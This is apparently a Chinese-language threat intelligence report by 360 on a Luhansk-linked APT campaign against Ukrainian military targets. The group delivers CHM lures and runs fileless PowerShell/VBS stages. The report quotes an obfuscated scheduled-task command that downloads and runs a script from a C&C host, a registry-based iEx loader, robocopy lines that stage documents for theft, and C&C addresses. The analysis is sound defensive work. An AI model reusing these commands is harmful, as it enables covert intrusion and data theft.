盧甘斯克組織針對烏克蘭的最新定向攻擊活動分析 - 網安 - 專業的網絡安全產業、社區、知識平臺

概述

盧甘斯克位于烏克蘭東部，原名伏羅希洛夫格勒，是烏克蘭最東部一個州盧甘斯克州的首府。其緊鄰俄羅斯，和其他許多烏克蘭東部州一樣，該地區主要講俄語。2014年4月28日，烏克蘭盧甘斯克的集會者宣布成立“盧甘斯克人民共和國“，并向俄羅斯等14個國家提出了承認其獨立的要求，目前尚未得到烏克蘭及國際社會承認。

2019年初，國外安全廠商披露了一起疑似盧甘斯克背景的APT組織針對烏克蘭政府的定向攻擊活動，根據相關報告分析該組織的攻擊活動至少可以追溯到2014年，曾大量通過網絡釣魚、水坑攻擊等方式針對烏克蘭政府機構進行攻擊，在其過去的攻擊活動中曾使用過開源Quasar RAT 和 VERMIN等惡意軟件，捕獲目標的音頻和視頻，竊取密碼，獲取機密文件等等。

近日，360安全大腦監測到盧甘斯克組織針對烏克蘭軍事目標的最新攻擊活動，通過360高級威脅研究院的深入分析溯源，發現此次攻擊活動采用了新的誘餌文檔、惡意腳本荷載，同時發現該組織疑似偽裝成云盤備份的方式進行攻擊竊密。

攻擊活動分析

盧甘斯克組織向目標投遞了大量包含惡意CHM文件的ZIP壓縮包，誘餌文件名稱都使用了烏克蘭語，如名稱為01_?нф.про_вияв.поруш.zip（翻譯：01關于檢測的信息.zip）ZIP壓縮包，包含Додаток1.chm（翻譯：插件1.chm）的chm惡意文件。

在目標打開chm惡意文件后，惡意程序會通過powershell和vbs惡意腳本文件進行大量的文件竊取操作和植入木馬行為。

第一階段，攻擊程序會調用schtasks創建偽裝adobe的powershell計劃任務。
第二階段，計劃任務啟動后powershell會定期向C&C通信，獲得下一階段的vbs腳本并創建vbs文件的計劃任務。
第三階段，vbs文件定期讀取指定注冊表鍵值，并利用rococopy將后綴名稱是*.rtf *.txt *.z00 *.z01 *.z02 *.z03 *.pdf *.zip *.rar *.7z *.doc *.docx *.docm *.xls *.xlsx *.ppt *.pptx *.xlsm *.jpg *.jpeg *.cdr拉取到偽裝的云盤目錄，然后進行文件竊取。
第四階段，通過csc命令實時編譯C#代碼安裝持久化的loader后門程序

攻擊過程分析

盧甘斯克組織的整個攻擊過程都使用了典型的無文件腳本攻擊方式，所有攻擊動作都通過C&C下發的自定義腳本在內存中執行，大大提高了安全軟件的查殺和安全人員的追蹤分析難度。通過360安全大腦的遙測我們發現了該組織以下的主要攻擊行為:

通過CHM文檔執行計劃任意命令

惡意壓縮包文件內包含了惡意的chm文檔

惡意的chm文件打開后會創建計劃任務，偽裝成名字為adobeperflog的計劃任務，以避免引起目標的懷疑，計劃任務會定期通過powershell命令執行從C&C下發的自定義惡意腳本。

| schtasks.exe /create /sc minute /mo 90 -f /tn “AdobePerflog” /tr “powershell -w h -noni $d=$shelliD;$z=New-Object -ComObject MsXml2.ServerXmlHttp;$z.Open(‘’’GET’’’,’’’https://w0x.'''+$d[16]+'''ost'''+'''/news''',$false);$z.Send();$a=(-Join(((GI Variable:\MmDt).Name)[9,11,2]));&($a)(&($a)$z.ResponseText) “ |

通過Vbs腳本執行自定義命令

我們觀測到計劃任務會執行C&C下載的Vbs腳本，通過傳入的參數執行任意命令。

其中我們發現部分命令會讀取特定注冊表的鍵值，目前無法確定該動作意義，疑似是攻擊者對目標自定義操作。

| %UserProfile%\AppData\Roaming\Adobe\Version\update.vbs powershell -NoP -NonI -w hidden iEx((Get-ItemProperty -Path ‘Registry::HKEY_CURRENT_USER\Software\AppDataLow\Software\463’ -Name ‘Hile’).Hile) |

利用rococopy和云盤備份竊取文件

該組織會使用rococopy命令拷貝中招用戶所有磁盤路徑下，包含*.rtf *.txt *.z00 *.z01 *.z02 *.z03 *.pdf *.zip *.rar *.7z *.doc *.docx *.docm *.xls *.xlsx *.ppt *.pptx *.xlsm *.jpg *.jpeg *.cdr后綴的文件至SugarSync和OneDrive網絡硬盤目錄，疑似通過偽裝成云盤備份的方式竊取機密文件。

| %UserProfile%\AppData\Roaming\SugarSync\CloudBackup *.rtf *.txt *.z00 *.z01 *.z02 *.z03 *.pdf *.zip *.rar *.7z *.doc *.docx *.docm *.xls *.xlsx *.ppt *.pptx *.xlsm *.jpg *.jpeg *.cdr /MAX:20971520 /MAXAGE:31 /s /DCOPY:T |

| %UserProfile%\AppData\Roaming\OneDrive\Backup *.rtf *.txt *.z00 *.z01 *.z02 *.z03 *.pdf *.zip *.rar *.7z *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.xlsm *.jpeg *.cdr /MAX:10485760 /MAXAGE:31 /s /DCOPY:T |

通過csc命令編譯執行C# Loader

最終我們發現了該組織的一些使用csc命令進行的攻擊動作

攻擊者將惡意荷載的C#源代碼釋放到臨時文件目錄進行編譯

惡意荷載的Loader程序會將自身注冊為自啟動程序

Loader通過regasm執行編譯到臨時文件夾下的C# dll荷載

關聯分析

此次攻擊活動中盧甘斯克組織仍然使用了部分被曝光披露的基礎設施，如unian[.]pw和78.140.167.89已經被披露超過一年，但該組織仍未放棄使用。

總結

通過報告可以看到盧甘斯克組織在持續更新迭代網絡武器，重點使用腳本類的無文件攻擊方式，提高了安全廠商的發現和分析難度。同時該組織疑似通過云盤備份的方式竊取機密文件，此類攻擊方式也加大了網絡異常流量識別的難度。地緣政治問題發起的APT攻擊仍然需要引起我們的重點關注，此類攻擊目標明確，且攻擊持續性較強，攻擊者會不斷迭代攻擊技術，相關的政府機構需要提高警惕。

附錄IOC

C&C

176.119.2.122:443

87.251.77.19:443

inforesist.press/blog/publish/

mytv.host/news

depo.host/blog/publish/

w0x.host/news

原創： 360威脅情報中心
原文鏈接：https://mp.weixin.qq.com/s/aMj_EDmTYyAouHW...